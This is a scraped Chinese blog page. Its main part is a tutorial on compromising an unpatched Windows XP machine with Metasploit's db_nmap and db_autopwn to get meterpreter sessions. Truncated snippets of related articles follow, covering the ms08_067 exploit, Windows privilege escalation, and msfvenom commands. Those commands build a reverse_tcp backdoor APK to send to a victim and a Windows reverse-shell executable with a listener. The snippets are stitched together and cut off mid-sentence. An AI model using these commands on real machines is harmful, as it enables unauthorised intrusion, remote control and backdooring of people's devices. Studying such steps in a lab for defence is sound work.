使用Metasploit入侵windows之自动扫描

最新版本的metasploit为4.0,可以通过官方网站(www.metasploit.com)直接下载,因为是开源的,所以免费。

metasploit很好很强大,集成了700多种exploit,但是如果操作系统打满了补丁,也还是很难入侵的,所以为了测试,选择了windows xp最古老的版本,就是不带任何的SPx补丁 ,或者可以选择windows xp SP1版本,反正漏洞越多吗,越容易攻击。

打开metasploit console,等待启动,启动完,确认没有错误信息,而是正常启动,尤其是跟postgreSQL数据库的链接。

输入命令db_status查看与数据库的连接状态,显示下图表示链接成功

我们开始扫描winXP系统开发的端口,使用端口扫描指令,db_nmap,见下图

扫描完了后,发现有135、139、445等断开开放,所以接下来要实施攻击

输入指令db_autopwn,见下图


可以看到,metasploit正在探测各种漏洞,看是否匹配刚才检测出来的端口,接下来他会自动进行登录尝试,看是否能建立连接

最后我们发现有两个session可以建立与对方连接,并获取权限,我通过sessions命令进一步查看


这里session类型是meterpreter,不同类型,建立链接后可以执行不同操作,我们先建立链接,就是使用session命令后面加个-i


建立链接后,我们通过?好查看可以执行什么样的操作


具体操作,就不在这里进行阐述了,自己去尝试。

OK,以上就是自动漏洞扫描的全过程。

使用Metasploit入侵windows之自动扫描

时间: 2024-10-31 02:46:19

使用Metasploit入侵windows之自动扫描的相关文章

演示使用Metasploit入侵Windows

我使用Kali Linux的IP地址是192.168.0.112:在同一局域网内有一台运行Windows XP(192.168.0.108)的测试电脑. 本文演示怎么使用Metasploit入侵windows xp sp3. 启动msfconsole: # msfconsole 选择一个漏洞: msf > search platform: windows xp sp3 exploit/windows/smb/ms08_067_netapi是08年发现的漏洞,等级Great. 查看某个漏洞的详细信

metasploit下Windows的多种提权方法

metasploit下Windows的多种提权方法 前言 当你在爱害者的机器上执行一些操作时,发现有一些操作被拒绝执行,为了获得受害机器的完全权限,你需要绕过限制,获取本来没有的一些权限,这些权限可以用来删除文件,查看私有信息,或者安装特殊程序,比如病毒.Metasploit有很多种后渗透方法,可以用于对目标机器的权限绕过,最终获取到系统权限. 环境要求: 1.攻击机:kali linux 2.目标机:Win 7 在已经获取到一个meterpreter shell后,假如session为1,且权

metasploit下Windows下多种提权方式

前言 当你在爱害者的机器上执行一些操作时,发现有一些操作被拒绝执行,为了获得受害机器的完全权限,你需要绕过限制,获取本来没有的一些权限,这些权限可以用来删除文件,查看私有信息,或者安装特殊程序,比如病毒.Metasploit有很多种后渗透方法,可以用于对目标机器的权限绕过,最终获取到系统权限. 环境要求: 1.攻击机:kali linux 2.目标机:Win 7 在已经获取到一个meterpreter shell后,假如session为1,且权限不是系统权限的前提下,使用以下列出的几种提权方法:

演示使用Metasploit入侵Android

文本演示怎么使用Kali Linux入侵Android手机. Kali Linux IP地址:192.168.0.112:接收连接的端口:443. 同一局域网内android手机一部(android 5.1) 创建一个后门程序 在终端中执行: # msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.112 LPORT=443 > my_backdoor.apk 这个后门程序(APK)是发送给受害者的:要把上面命令的IP地址替换为

kali中利用Metasploit进行windows主机控制

网络拓扑:1.生成shellcode:[email protected]:~# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.152.131 lport=1211 -f exe > /root/shell.exe 2.侦听shellcode:msf > use exploit/multi/handler msf exploit(multi/handler) > set payload windows/meterpret

kali linux 入侵window实例

我使用Kali Linux的IP地址是192.168.0.112:在同一局域网内有一台运行Windows XP(192.168.0.108)的测试电脑. 本文演示怎么使用Metasploit入侵windows xp sp3. 启动msfconsole: # msfconsole 选择一个漏洞: msf > search platform: windows xp sp3 exploit/windows/smb/ms08_067_netapi是08年发现的漏洞,等级Great. 查看某个漏洞的详细信

Metasploit 渗透测试魔鬼训练营读书笔记(连续更新一)

1.1 什么是渗透测试 1.1.1 渗透测试的起源与定义 如果大家对军事感兴趣,会知道各国军队每年都会组织一些军事演习来锻炼军队的攻防战术与作战能力.在信息科技的发源地--美国的军事演习中,将美军称为"蓝军",将假想敌称为"红军",而这种军事演习的方式也在20世纪90年代时,由美国军方与国家安全局引入到对信息网络与信息安全基础设施的实际攻防测试过程中.由一群受过职业训练的安全专家作为"红队"(Red Team),对接受测试的防御方"蓝队

2017-2018-2 20155315《网络对抗技术》免考五:Windows提权

原理 使用metasploit使目标机成功回连之后,要进一步攻击就需要提升操作权限.对于版本较低的Windows系统,在回连的时候使用getsystem提权是可以成功的,但是对于更高的系统操作就会被拒绝.为了获得受害机器的完全权限,需要绕过限制,获取本来没有的一些权限,这些权限可以用来删除文件,查看私有信息,或者安装特殊程序,比如病毒. Metasploit有很多种后渗透方法,可以用于对目标机器的权限绕过,最终获取到系统权限. UAC 用户帐户控制(User Account Control, U

如何抓到入侵网站的黑客?

shotgun ,讲故事的黑客 366 人赞同 利益相关:信息安全从业人员,曾在某大学教过公安部委托培训信息安全硕士<攻防与技术侦破>专业课. ====== 按照时间划分,一次犯罪是由犯罪动机.犯罪方法和犯罪后果三个部分构成的,那么侦破也相应的可以从这三个部分分别入手. 先来看动机,最难侦破的是无动机犯罪,例如走在街上临时起意做了个案子,回家后洗心革面重新做人,这种案子往往会成为“悬案”,除非当事人主动承认或者再次犯案.绝大多数的犯罪都是有动机的,冲突口角.获取利益.炫耀出名等等,发生计算机犯